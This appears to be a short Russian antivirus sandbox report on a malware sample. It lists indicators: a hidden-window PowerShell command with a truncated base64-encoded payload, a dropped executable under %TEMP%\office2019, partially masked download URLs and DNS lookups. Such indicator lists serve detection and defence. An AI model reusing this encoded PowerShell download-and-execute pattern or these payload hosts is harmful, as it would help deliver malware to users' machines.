Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHIANAA3ADkAbwB2AD0AKAAnAFEAcwA3ACcAKwAnADEAaQAnACsAJwBnADUAJwApADsALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBQAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\rumt_19.exe
- %TEMP%\office2019\rumt_19.exe
- %TEMP%\office2019\rumt_19.exe
- http://an#####.#eadersareleader.com/fetch/OiIXe/
- http://no###atmtk.com/temp/EBlKvJw/
- http://am#e.in/js/ixqaSyVn/
- http://co#########rldwidetransportation.com/wp-includes/qKnMbB/
- http://ph###acmi.com/vendor/KPNWyhJ/
- DNS ASK an#####.#eadersareleader.com
- DNS ASK no###atmtk.com
- DNS ASK am#e.in
- DNS ASK co#########rldwidetransportation.com
- DNS ASK re####realty.com
- DNS ASK ph###acmi.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHIANAA3ADkAbwB2AD0AKAAnAFEAcwA3ACcAKwAnADEAaQAnACsAJwBnADUAJwApADsALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBQAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)